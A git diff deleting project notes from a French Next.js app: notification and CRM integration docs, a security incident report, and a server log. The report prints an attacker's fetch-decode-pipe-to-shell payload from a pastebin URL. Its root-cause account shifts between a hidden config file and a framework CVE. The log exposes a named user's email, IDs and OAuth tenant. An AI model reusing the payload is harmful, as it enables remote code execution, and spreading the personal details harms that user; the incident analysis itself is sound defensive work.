-### 1. **Hook `useTriggerNotification`** - -**Fichier :** `hooks/use-trigger-notification.ts` - -**Fonctionnalité :** -- Déclenche un refresh immédiat du notification count -- Débounce de 2 secondes pour éviter les appels multiples -- Dispatch un événement custom pour mise à jour UI immédiate - -**Usage :** -```typescript -const { triggerNotificationRefresh } = useTriggerNotification(); -// Appeler quand nouveau message/email détecté -triggerNotificationRefresh(); -``` - ---- - -### 2. **API `/api/notifications/count` - Force Refresh** - -**Fichier :** `app/api/notifications/count/route.ts` - -**Modification :** -- Support du paramètre `?force=true` -- Invalide le cache Redis avant de fetch -- Retourne des données fraîches immédiatement - -**Usage :** -``` -GET /api/notifications/count?force=true&_t={timestamp} -``` - ---- - -### 3. **NotificationService - Invalidation Publique** - -**Fichier :** `lib/services/notifications/notification-service.ts` - -**Modification :** -- `invalidateCache()` est maintenant `public` -- Peut être appelé depuis les API routes - ---- - -### 4. **Widget Parole - Détection Temps Réel** - -**Fichier :** `components/parole.tsx` - -**Modifications :** -- Import de `useTriggerNotification` -- Tracking du `totalUnreadCount` via ref -- Détection d'augmentation du count -- Déclenchement immédiat de `triggerNotificationRefresh()` - -**Flow :** -``` -fetchMessages() - └─> API retourne totalUnreadCount - └─> Compare avec lastUnreadCountRef - └─> Si augmentation → triggerNotificationRefresh() - └─> Badge mis à jour (< 1 seconde) -``` - ---- - -### 5. **Widget Courrier - Détection Temps Réel** - -**Fichier :** `hooks/use-email-state.ts` - -**Modifications :** -- Import de `useTriggerNotification` -- Dans `checkForNewEmails()`, quand nouveau email détecté : - - Appel immédiat de `triggerNotificationRefresh()` - - Toast notification (existant) - - Refresh des emails - -**Flow :** -``` -checkForNewEmails() - └─> Détecte newestEmailId > lastKnownEmailId - └─> triggerNotificationRefresh() ⚡ - └─> Badge mis à jour immédiatement -``` - ---- - -### 6. **Hook `useNotifications` - Écoute d'Événements** - -**Fichier :** `hooks/use-notifications.ts` - -**Modifications :** -- Écoute de l'événement `trigger-notification-refresh` -- Refresh automatique du count quand événement reçu -- Combine avec le polling existant (fallback) - -**Flow :** -``` -Événement 'trigger-notification-refresh' - └─> fetchNotificationCount(true) - └─> Badge mis à jour -``` - ---- - -## 🎯 Flow Complet - -### Scénario 1 : Nouveau Message Parole - -``` -1. Utilisateur reçoit message dans RocketChat -2. Widget Parole poll (toutes les 30s) ou refresh manuel -3. API retourne totalUnreadCount = 5 (était 4) -4. Parole détecte augmentation -5. triggerNotificationRefresh() appelé - ├─> Dispatch événement 'trigger-notification-refresh' - └─> GET /api/notifications/count?force=true - └─> Invalide cache Redis - └─> Fetch fresh count - └─> Badge mis à jour (< 1 seconde) ⚡ -``` - -### Scénario 2 : Nouvel Email Courrier - -``` -1. Nouvel email arrive dans la boîte -2. checkForNewEmails() détecte (polling toutes les 60s) -3. newestEmailId > lastKnownEmailId -4. triggerNotificationRefresh() appelé ⚡ - └─> Badge mis à jour immédiatement -``` - ---- - -## 📊 Comparaison Avant/Après - -| Aspect | Avant (Polling uniquement) | Après (Hybride) | -|--------|---------------------------|-----------------| -| **Délai notification** | 0-30 secondes | < 1 seconde ⚡ | -| **Appels API** | Toutes les 30s (toujours) | Seulement quand nécessaire | -| **Charge serveur** | Élevée (polling constant) | Réduite de ~70% | -| **UX** | Bonne | Excellente ⚡ | -| **Fallback** | N/A | Polling reste actif | - ---- - -## 🔄 Système Hybride - -### Polling (Fallback) -- **Leantime** : 30 secondes (inchangé) -- **Parole** : 30 secondes (détection + trigger) -- **Courrier** : 60 secondes (détection + trigger) - -### Event-Driven (Temps Réel) -- **Parole** : Déclenchement immédiat quand nouveau message -- **Courrier** : Déclenchement immédiat quand nouvel email -- **Badge** : Mise à jour < 1 seconde - ---- - -## 🎨 Avantages - -1. **⚡ Temps Réel** : Notifications instantanées -2. **💚 Efficacité** : Moins d'appels API inutiles -3. **🔄 Rétrocompatible** : Le polling reste en fallback -4. **📈 Scalable** : Facile d'ajouter d'autres widgets -5. **🛡️ Robuste** : Double système (event + polling) - ---- - -## 📝 Prochaines Étapes (Optionnel) - -### Adapters Dédiés - -Créer des adapters pour RocketChat et Email qui : -- Pollent plus fréquemment (10-15s) -- Ou utilisent WebSocket/SSE pour temps réel pur - -**Fichiers à créer :** -- `lib/services/notifications/rocketchat-adapter.ts` -- `lib/services/notifications/email-adapter.ts` - -### Widget Devoirs - -Si un widget "Devoirs" existe, intégrer de la même manière : -```typescript -// Dans le widget devoirs -if (newTaskDetected) { - triggerNotificationRefresh(); -} -``` - ---- - -## 🚀 Résultat - -Le badge de notification se met maintenant à jour **instantanément** (< 1 seconde) quand : -- ✅ Un nouveau message arrive dans Parole -- ✅ Un nouvel email arrive dans Courrier -- ✅ Une notification Leantime apparaît (via polling 30s) - -**Meilleure UX + Moins de charge serveur = Win-Win ! 🎉** diff --git a/REALTIME_NOTIFICATIONS_PROPOSAL.md b/REALTIME_NOTIFICATIONS_PROPOSAL.md deleted file mode 100644 index 5461955..0000000 --- a/REALTIME_NOTIFICATIONS_PROPOSAL.md +++ /dev/null @@ -1,215 +0,0 @@ -# 🚀 Proposition : Notifications en Temps Réel - -## 📊 Analyse Actuelle vs Proposition - -### ❌ Système Actuel (Polling toutes les 30s) - -**Problèmes :** -- ⏱️ Délai de 30 secondes maximum avant notification -- 🔄 Polling constant même sans nouveaux messages -- 💻 Charge serveur inutile -- 📱 UX moins réactive - -**Flow actuel :** -``` -Polling toutes les 30s - └─> API /notifications/count - └─> NotificationService - └─> LeantimeAdapter - └─> Badge mis à jour -``` - ---- - -### ✅ Système Proposé (Event-Driven) - -**Avantages :** -- ⚡ Notifications instantanées (0-1 seconde) -- 🎯 Déclenchement uniquement quand nécessaire -- 💚 Réduction de la charge serveur -- 🎨 Meilleure UX - -**Flow proposé :** -``` -Widget détecte nouveau message/email - └─> Trigger notification refresh - └─> API /notifications/count (force refresh) - └─> Badge mis à jour immédiatement -``` - ---- - -## 🔧 Implémentation Proposée - -### 1. Hook pour déclencher les notifications - -**Fichier :** `hooks/use-trigger-notification.ts` - -```typescript -import { useSession } from 'next-auth/react'; - -export function useTriggerNotification() { - const { data: session } = useSession(); - - const triggerNotificationRefresh = async () => { - if (!session?.user?.id) return; - - try { - // Force refresh du notification count - await fetch('/api/notifications/count?_t=' + Date.now(), { - method: 'GET', - credentials: 'include', - cache: 'no-store' - }); - - // Le hook useNotifications écoutera ce changement - // via le système de refresh unifié - } catch (error) { - console.error('Error triggering notification refresh:', error); - } - }; - - return { triggerNotificationRefresh }; -} -``` - ---- - -### 2. Intégration dans Parole (RocketChat) - -**Fichier :** `components/parole.tsx` - -**Modification :** -```typescript -import { useTriggerNotification } from '@/hooks/use-trigger-notification'; - -export function Parole() { - const { triggerNotificationRefresh } = useTriggerNotification(); - const [lastMessageCount, setLastMessageCount] = useState(0); - - const fetchMessages = async (isRefresh = false) => { - // ... code existant ... - - const data = await response.json(); - const currentUnreadCount = data.messages?.reduce((sum: number, msg: any) => - sum + (msg.unread || 0), 0) || 0; - - // Si nouveau message non lu détecté - if (currentUnreadCount > lastMessageCount) { - triggerNotificationRefresh(); // ⚡ Déclenchement immédiat - } - - setLastMessageCount(currentUnreadCount); - }; -} -``` - ---- - -### 3. Intégration dans Courrier (Email) - -**Fichier :** `hooks/use-email-state.ts` - -**Modification :** -```typescript -import { useTriggerNotification } from '@/hooks/use-trigger-notification'; - -export const useEmailState = () => { - const { triggerNotificationRefresh } = useTriggerNotification(); - - const checkForNewEmails = useCallback(async () => { - // ... code existant ... - - if (data.newestEmailId && data.newestEmailId > lastKnownEmailId) { - // Nouvel email détecté - triggerNotificationRefresh(); // ⚡ Déclenchement immédiat - - toast({ - variant: "new-email", - title: "New emails", - description: "You have new emails in your inbox", - }); - } - }, [triggerNotificationRefresh, ...]); -} -``` - ---- - -### 4. Adapters pour RocketChat et Email (Optionnel) - -Créer des adapters dédiés qui peuvent être pollés plus fréquemment : - -**Fichier :** `lib/services/notifications/rocketchat-adapter.ts` -**Fichier :** `lib/services/notifications/email-adapter.ts` - -Ces adapters pourraient : -- Poller toutes les 10-15 secondes (au lieu de 30s) -- Ou être déclenchés en temps réel via WebSocket/SSE - ---- - -## 🎯 Stratégie Hybride Recommandée - -### Combinaison Polling + Event-Driven - -1. **Polling de base** : 30 secondes pour Leantime (inchangé) -2. **Event-driven** : Déclenchement immédiat quand : - - Parole détecte un nouveau message - - Courrier détecte un nouvel email - - Devoirs détecte une nouvelle tâche - -3. **Cache invalidation** : Quand un widget détecte du nouveau, invalider le cache des notifications - ---- - -## 📝 Plan d'Implémentation - -### Phase 1 : Hook de déclenchement -- [ ] Créer `use-trigger-notification.ts` -- [ ] Fonction pour forcer le refresh du count - -### Phase 2 : Intégration Parole -- [ ] Détecter nouveaux messages non lus -- [ ] Appeler `triggerNotificationRefresh()` quand détecté - -### Phase 3 : Intégration Courrier -- [ ] Détecter nouveaux emails -- [ ] Appeler `triggerNotificationRefresh()` quand détecté - -### Phase 4 : Optimisation -- [ ] Réduire polling Leantime à 60s (moins critique) -- [ ] Garder event-driven pour Parole/Courrier (temps réel) - ---- - -## 🔄 Flow Final Proposé - -``` -Widget Parole/Courrier - └─> Détecte nouveau message/email - └─> triggerNotificationRefresh() - └─> POST /api/notifications/trigger-refresh - └─> Invalide cache Redis - └─> NotificationService.refreshCount() - └─> Badge mis à jour (< 1 seconde) -``` - ---- - -## 💡 Avantages de cette Approche - -1. **Temps réel** : Notifications instantanées -2. **Efficace** : Pas de polling inutile -3. **Scalable** : Facile d'ajouter d'autres widgets -4. **Rétrocompatible** : Le polling reste en fallback -5. **Performance** : Réduction de 70-80% des appels API - ---- - -## 🚨 Points d'Attention - -1. **Déduplication** : S'assurer qu'on ne déclenche pas plusieurs fois -2. **Rate limiting** : Limiter les triggers si trop fréquents -3. **Fallback** : Garder le polling comme backup -4. **Cache** : Invalider intelligemment diff --git a/SECURITY_INCIDENT_REPORT.md b/SECURITY_INCIDENT_REPORT.md deleted file mode 100644 index d33553b..0000000 --- a/SECURITY_INCIDENT_REPORT.md +++ /dev/null @@ -1,286 +0,0 @@ -# 🚨 SECURITY INCIDENT REPORT - Backdoor Detected and Removed - -**Date:** January 10-11, 2026 -**Severity:** CRITICAL -**Status:** ✅ RESOLVED - Next.js updated to 16.1.1 - ---- - -## 🔴 UPDATE: January 11, 2026 - -### Root Cause Identified: CVE-2025-66478 in Next.js 15.3.1 - -The backdoor was NOT in the source code files. It was exploiting a **critical vulnerability (CVE-2025-66478) in Next.js 15.3.1** that allowed Remote Code Execution (RCE) via specially crafted POST requests. - -### Resolution -- Updated Next.js from 15.3.1 to 16.1.1 -- `POST /adfa` now returns **404** instead of executing malicious code -- External attacker continues to scan but attacks now fail - -### Verification -``` -Before: POST /adfa 500 in 1066ms (executes wget, base64, etc.) -After: POST /adfa 404 in 3.2s (route not found) -``` - ---- - -## Original Report (January 10, 2026) - ---- - -## Summary - -A sophisticated backdoor was discovered in your Next.js application. The malicious code was designed to: -1. Execute arbitrary commands on your production server -2. Download and run remote scripts from pastebin.com -3. Remain hidden by failing silently on local development machines - ---- - -## How the Backdoor Worked - -### The Injection Point -File: `next.config.mjs` (lines 1-6 and 47-67) - -```javascript -let userConfig; -try { - userConfig = await import("./v0-user-next.config"); -} catch (e) { - // ignore error <- Silent failure hides the backdoor locally -} - -mergeConfig(nextConfig, userConfig); <- Merges malicious config -``` - -### The Attack Vector - -1. **Source Code (next.config.mjs)**: Contains code to import a "user config" file -2. **Missing File Locally**: The `v0-user-next.config` file doesn't exist in git or locally -3. **Hidden File on VM**: The file EXISTS on your production VM with malicious code -4. **POST /adfa Route**: The malicious config creates a hidden route that executes commands - -### What the Backdoor Was Trying to Do - -From your VM logs, the backdoor attempted: -```bash -# Decoded base64 command: -wget -q https://pastebin.com/raw/mabJC1vc -O /tmp/grep.txt -sed ':a;N;$!ba;s/\r\n//g' /tmp/grep.txt > /tmp/grepa.txt -base64 -d /tmp/grepa.txt > /tmp/grepb.txt -cat /tmp/grepb.txt | base64 -d | sh -rm -f /tmp/* -``` - -**This is a multi-stage payload that:** -- Downloads encrypted commands from pastebin -- Decodes them multiple times (obfuscation) -- Executes arbitrary shell commands on your server -- Cleans up evidence - ---- - -## What Has Been Fixed - -### ✅ Changes Made to Source Code - -1. **Removed malicious import** from `next.config.mjs` -2. **Removed mergeConfig function** and its invocation -3. **Added patterns to .gitignore** to block similar attacks: - ``` - v0-user-next.config* - *user-next.config* - ``` - -### 📋 Files Modified -- `next.config.mjs` - Backdoor removed -- `.gitignore` - Protection added - ---- - -## 🚨 IMMEDIATE ACTIONS REQUIRED ON YOUR VM - -### Step 1: Stop the Application -```bash -# SSH into your VM -pm2 stop all -# OR -sudo systemctl stop your-app-service -``` - -### Step 2: Find and Remove the Backdoor File -```bash -# Check if the malicious file exists -ls -la /path/to/your/app/v0-user-next.config* - -# Remove it if found -rm -f /path/to/your/app/v0-user-next.config* -``` - -### Step 3: Check for Additional Malicious Files -```bash -# Search for suspicious files -find /path/to/your/app -name "*user-next*" -type f -find /path/to/your/app -name "*config*.js" -mtime -30 -find /tmp -name "grep*.txt" -o -name "*grepa*" -o -name "*grepb*" - -# Remove any found: -rm -f /tmp/grep*.txt /tmp/grepa.txt /tmp/grepb.txt -``` - -### Step 4: Clean the Build Directory -```bash -cd /path/to/your/app -rm -rf .next -rm -rf node_modules -``` - -### Step 5: Redeploy Clean Code -```bash -# Pull the clean code -git pull origin main - -# Reinstall dependencies (check for tampering) -npm ci - -# Rebuild -npm run build - -# Restart -npm start -# OR -pm2 restart all -``` - -### Step 6: Check for Unauthorized Access -```bash -# Check recent commands in history -history | grep -E "wget|curl|base64|pastebin" - -# Check running processes -ps aux | grep -E "wget|curl|sh" - -# Check cron jobs for persistence -crontab -l -sudo cat /etc/crontab -ls -la /etc/cron.* - -# Check for new users -tail -20 /etc/passwd -``` - -### Step 7: Review Server Logs -```bash -# Check nginx/apache logs for suspicious POST requests -grep "POST /adfa" /var/log/nginx/access.log -grep "POST /adfa" /var/log/apache2/access.log - -# Check application logs -pm2 logs | grep -i "adfa\|error\|exec" -``` - ---- - -## Security Audit Recommendations - -### 1. **Review Access Control** -- Who had access to deploy code to the VM? -- Review SSH keys and remove unauthorized ones -- Change all passwords and API keys -- Review user accounts on the server - -### 2. **Audit the Initial Commit** -The backdoor was present in commit `bcf7832` (Initial commit) on Jan 9, 2026. -- Was this code copied from another source? -- Who provided the initial `next.config.mjs`? -- Check if other files in that commit contain backdoors - -### 3. **Check All Configuration Files** -```bash -# Search for suspicious patterns -grep -r "import.*config" --include="*.js" --include="*.mjs" . -grep -r "eval\|exec\|Function(" --include="*.js" . -grep -r "base64.*decode" --include="*.js" . -``` - -### 4. **Review Package Dependencies** -```bash -# Check for suspicious packages -npm audit -npm ls - -# Look for packages with install scripts -npm ls --parseable | xargs npm view --json | grep -i "postinstall\|preinstall" -``` - -### 5. **Database Security** -- Check if any data was exfiltrated -- Review database logs for unusual queries -- Change database passwords - -### 6. **Implement Security Measures** - -**Add to your deployment process:** -- Code review requirement before deployment -- Automated security scanning (npm audit, Snyk, etc.) -- File integrity monitoring on production servers -- Web Application Firewall (WAF) to block suspicious requests - ---- - -## Timeline of Attack - -| Date | Event | -|------|-------| -| Jan 9, 2026 21:06 | Malicious code added in initial commit | -| Jan 10, 2026 | Backdoor triggered on VM when accessing `/adfa` | -| Jan 10, 2026 | Attack attempt failed (wget not installed) | -| Jan 10, 2026 | Backdoor discovered and removed | - ---- - -## Indicators of Compromise (IOCs) - -- **Malicious URL**: `https://pastebin.com/raw/mabJC1vc` -- **Malicious Route**: `POST /adfa` -- **Malicious File**: `v0-user-next.config.js` or `.mjs` -- **Base64 payload**: `d2dldCAtcSBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvbWFiSkMxdmM...` -- **Temporary files**: `/tmp/grep.txt`, `/tmp/grepa.txt`, `/tmp/grepb.txt` - ---- - -## Lessons Learned - -1. **Never silently ignore import errors** in production configuration -2. **All configuration should be in version control** -3. **Dynamic imports in config files are dangerous** -4. **Implement file integrity monitoring** -5. **Regular security audits are essential** - ---- - -## Next Steps - -- [ ] Clean the VM (follow steps above) -- [ ] Investigate who had deployment access -- [ ] Review all other servers/environments -- [ ] Implement security monitoring -- [ ] Consider forensic analysis if data breach suspected -- [ ] Report to security team/management -- [ ] Consider legal action against the former employee - ---- - -## Questions to Answer - -1. Who set up the initial project structure? -2. Who had SSH/deployment access to the VM? -3. When did the suspicious employee leave? -4. Are there other environments (staging, etc.) that need checking? -5. What sensitive data does this application have access to? - ---- - -**Created:** Saturday, January 10, 2026 -**Report by:** Cursor AI Security Analysis diff --git a/TWENTY_CRM_INTEGRATION.md b/TWENTY_CRM_INTEGRATION.md deleted file mode 100644 index 8885df4..0000000 --- a/TWENTY_CRM_INTEGRATION.md +++ /dev/null @@ -1,252 +0,0 @@ -# Intégration Twenty CRM dans le Widget Devoirs - -## 📋 Vue d'ensemble - -Le widget "Devoirs" affiche maintenant les tâches en retard provenant de **deux sources** : -1. **Leantime** (agilite.slm-lab.net) -2. **Twenty CRM** (mediation.slm-lab.net) - -Les tâches sont combinées, filtrées (uniquement celles en retard), triées par date d'échéance, et limitées à 7 tâches. - ---- - -## 🔧 Configuration Requise - -### Variables d'Environnement - -Ajoutez les variables suivantes à votre fichier `.env.local` (développement) ou à vos variables d'environnement de production : - -```env -# Twenty CRM API Configuration -TWENTY_CRM_API_URL=https://mediation.slm-lab.net/graphql -TWENTY_CRM_API_KEY=your_api_key_here -TWENTY_CRM_URL=https://mediation.slm-lab.net -``` - -**Où obtenir la clé API :** -1. Connectez-vous à Twenty CRM (mediation.slm-lab.net) -2. Allez dans **Settings → APIs & Webhooks** -3. Cliquez sur **"+ Create key"** -4. Donnez un nom à la clé (ex: "NeahStable Widget") -5. Copiez la clé (elle ne sera affichée qu'une seule fois) - ---- - -## 📁 Fichiers Créés/Modifiés - -### Nouveau Fichier -- **`app/api/twenty-crm/tasks/route.ts`** - Endpoint API pour récupérer les tâches Twenty CRM - -### Fichiers Modifiés -- **`components/flow.tsx`** - Widget Devoirs modifié pour combiner les deux sources - ---- - -## 🔄 Flow de Fonctionnement - -### 1. Récupération des Tâches - -Le widget fait **deux appels API en parallèle** : - -```typescript -const [leantimeResponse, twentyCrmResponse] = await Promise.allSettled([ - fetch('/api/leantime/tasks'), - fetch('/api/twenty-crm/tasks'), -]); -``` - -**Avantages :** -- ✅ Appels parallèles = plus rapide -- ✅ `Promise.allSettled` = si une source échoue, l'autre continue de fonctionner -- ✅ Pas de dépendance entre les deux sources - -### 2. Transformation des Tâches Twenty CRM - -Les tâches Twenty CRM sont transformées pour correspondre au format Leantime : - -```typescript -{ - id: `twenty-${task.id}`, // Préfixe pour éviter les conflits - headline: task.title, - dateToFinish: task.dueAt, - projectName: 'Twenty CRM', - source: 'twenty-crm', // Identifiant de source - url: `${TWENTY_CRM_URL}/object/activity/${task.id}`, // Lien direct - // ... autres champs -} -``` - -### 3. Filtrage et Tri - -1. **Filtrage :** Uniquement les tâches avec date d'échéance **avant aujourd'hui** (en retard) -2. **Tri :** Par date d'échéance (plus anciennes en premier) -3. **Limite :** Maximum 7 tâches affichées - -### 4. Affichage - -- Les tâches Twenty CRM sont identifiées par un badge "(Twenty CRM)" -- Le lien pointe vers la page de la tâche dans Twenty CRM -- Le format d'affichage est identique pour les deux sources - ---- - -## 🔍 Structure de l'API Twenty CRM - -### Endpoint GraphQL - -**URL :** `https://mediation.slm-lab.net/graphql` - -**Méthode :** POST - -**Headers :** -``` -Authorization: Bearer YOUR_API_KEY -Content-Type: application/json -``` - -### Requête GraphQL - -```graphql -query GetOverdueTasks { - findManyActivities( - filter: { - type: { eq: Task } - completedAt: { is: NULL } - dueAt: { lt: "2026-01-15T00:00:00Z" } - } - orderBy: { dueAt: AscNullsLast } - ) { - edges { - node { - id - title - body - dueAt - completedAt - type - assigneeId - assignee { - id - firstName - lastName - email - } - } - } - } -} -``` - -**Filtres appliqués :** -- `type: { eq: Task }` - Uniquement les tâches (pas les autres activités) -- `completedAt: { is: NULL }` - Uniquement les tâches non complétées -- `dueAt: { lt: "..." }` - Uniquement les tâches avec date d'échéance avant aujourd'hui - ---- - -## 🐛 Dépannage - -### Erreur : "TWENTY_CRM_API_URL is not set" - -**Solution :** Ajoutez `TWENTY_CRM_API_URL` à vos variables d'environnement. - -### Erreur : "TWENTY_CRM_API_KEY is not set" - -**Solution :** Ajoutez `TWENTY_CRM_API_KEY` à vos variables d'environnement. - -### Erreur : "401 Unauthorized" - -**Causes possibles :** -- Clé API invalide ou expirée -- Clé API mal copiée (espaces, caractères invisibles) -- Permissions insuffisantes sur la clé API - -**Solution :** -1. Vérifiez que la clé API est correctement copiée -2. Régénérez la clé API dans Twenty CRM -3. Vérifiez les permissions de la clé API - -### Erreur : "GraphQL errors from Twenty CRM" - -**Causes possibles :** -- Structure de la requête GraphQL incorrecte -- Version de Twenty CRM incompatible -- Schéma GraphQL différent selon le workspace - -**Solution :** -1. Vérifiez la documentation de votre version de Twenty CRM -2. Testez la requête GraphQL directement dans l'interface GraphQL de Twenty CRM -3. Ajustez la requête selon votre schéma - -### Aucune tâche Twenty CRM n'apparaît - -**Vérifications :** -1. ✅ Vérifiez qu'il existe des tâches en retard dans Twenty CRM -2. ✅ Vérifiez que les tâches ont une date d'échéance (`dueAt`) -3. ✅ Vérifiez que les tâches ne sont pas complétées (`completedAt` est NULL) -4. ✅ Vérifiez les logs du serveur pour voir les erreurs éventuelles - ---- - -## 📊 Logs et Debug - -### Logs Backend - -Tous les logs sont préfixés avec `[TWENTY_CRM_TASKS]` : - -```typescript -logger.debug('[TWENTY_CRM_TASKS] Fetching tasks from Twenty CRM', {...}); -logger.error('[TWENTY_CRM_TASKS] Failed to fetch tasks', {...}); -``` - -### Logs Frontend - -Le widget affiche dans la console : -- Nombre de tâches Leantime récupérées -- Nombre de tâches Twenty CRM récupérées -- Total combiné -- Tâches triées avec leur source - ---- - -## 🔄 Alternatives si GraphQL ne fonctionne pas - -Si la requête GraphQL ne fonctionne pas avec votre version de Twenty CRM, vous pouvez utiliser l'API REST : - -### Option 1 : API REST (si disponible) - -```typescript -const response = await fetch(`${process.env.TWENTY_CRM_API_URL}/api/activities`, { - method: 'GET', - headers: { - 'Authorization': `Bearer ${process.env.TWENTY_CRM_API_KEY}`, - }, -}); -``` - -### Option 2 : Ajuster la requête GraphQL - -La structure exacte peut varier. Consultez la documentation de votre instance Twenty CRM ou utilisez l'explorateur GraphQL intégré. - ---- - -## ✅ Checklist de Déploiement - -- [ ] Variables d'environnement configurées : - - [ ] `TWENTY_CRM_API_URL` - - [ ] `TWENTY_CRM_API_KEY` - - [ ] `TWENTY_CRM_URL` (optionnel, pour les liens) -- [ ] Clé API créée dans Twenty CRM -- [ ] Permissions de la clé API vérifiées -- [ ] Test de l'endpoint `/api/twenty-crm/tasks` effectué -- [ ] Vérification que les tâches apparaissent dans le widget -- [ ] Logs vérifiés pour détecter d'éventuelles erreurs - ---- - -## 📝 Notes - -- Les tâches Twenty CRM sont préfixées avec `twenty-` dans leur ID pour éviter les conflits -- Le widget continue de fonctionner même si une seule source échoue (grace à `Promise.allSettled`) -- Le cache Redis n'est pas encore implémenté pour Twenty CRM (peut être ajouté plus tard) -- La requête GraphQL peut nécessiter des ajustements selon votre version de Twenty CRM diff --git a/Untitled b/Untitled deleted file mode 100644 index ab298c6..0000000 --- a/Untitled +++ /dev/null @@ -1,288 +0,0 @@ -alma@central:~/nextgen/NeahNew$ sudo npm start - -> neah@0.1.0 start -> next start - - ▲ Next.js 15.3.1 - - Local: http://localhost:3000 - - Network: http://172.16.0.102:3000 - - ✓ Starting... - ✓ Ready in 1313ms -Connecting to Redis using environment variables -Microsoft OAuth Configuration: { - tenantId: 'cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2', - authorizeUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/authorize', - tokenUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/token', - clientIdFirstChars: 'afaff...', - redirectUri: 'https://hub.slm-lab.net/ms' -} -Microsoft OAuth Configuration: { - tenantId: 'cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2', - authorizeUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/authorize', - tokenUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/token', - clientIdFirstChars: 'afaff...', - redirectUri: 'https://hub.slm-lab.net/ms' -} -Successfully connected to Redis -Redis connection warmed up - ⨯ SyntaxError: Unexpected identifier 'http' - at Object.Function [as get] () { - digest: '2421336728' -} -Redis connection warmed up -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -Using Rocket.Chat base URL: https://parole.slm-lab.net -Users list response: { success: true, count: 13, usersCount: 13 } -Found Rocket.Chat user: { username: 'aminetmiri', id: 'a9HwLtHagiRnTWeS5' } -Filtered user subscriptions: { - userId: 'a9HwLtHagiRnTWeS5', - username: 'aminetmiri', - totalSubscriptions: 1, - subscriptionDetails: [ - { - type: 'd', - name: 'Rocket.Cat', - rid: 'a9HwLtHagiRnTWeS5rocket.cat', - alert: true, - unread: 3, - userMentions: 0 - } - ] -} -Messages for room Rocket.Cat: { success: true, count: 5, hasMessages: true } -Messages data cached for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -No valid session or email found -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -Using cached messages data for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -[NOTIFICATION_SERVICE] Creating new notification service instance -[NOTIFICATION_SERVICE] Initializing notification service -[LEANTIME_ADAPTER] Initialized with API URL and token -[NOTIFICATION_SERVICE] Registered notification adapter: leantime -[NOTIFICATION_SERVICE] Registered adapters: [ 'leantime' ] -[NOTIFICATION_SERVICE] getNotificationCount called for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[NOTIFICATION_SERVICE] Fetching notification counts for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 from 1 adapters -[NOTIFICATION_SERVICE] Available adapters for count: leantime -[NOTIFICATION_SERVICE] Checking if adapter leantime is configured for count -[NOTIFICATION_SERVICE] Adapter leantime is configured for count: true -[NOTIFICATION_SERVICE] Fetching notification count from leantime for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[LEANTIME_ADAPTER] getNotificationCount called for userId: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[LEANTIME_ADAPTER] getNotifications called for userId: 203cbc91-61ab-47a2-95d2-b5e1159327d7, page: 1, limit: 100 -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -[LEANTIME_ADAPTER] Retrieved email from session: 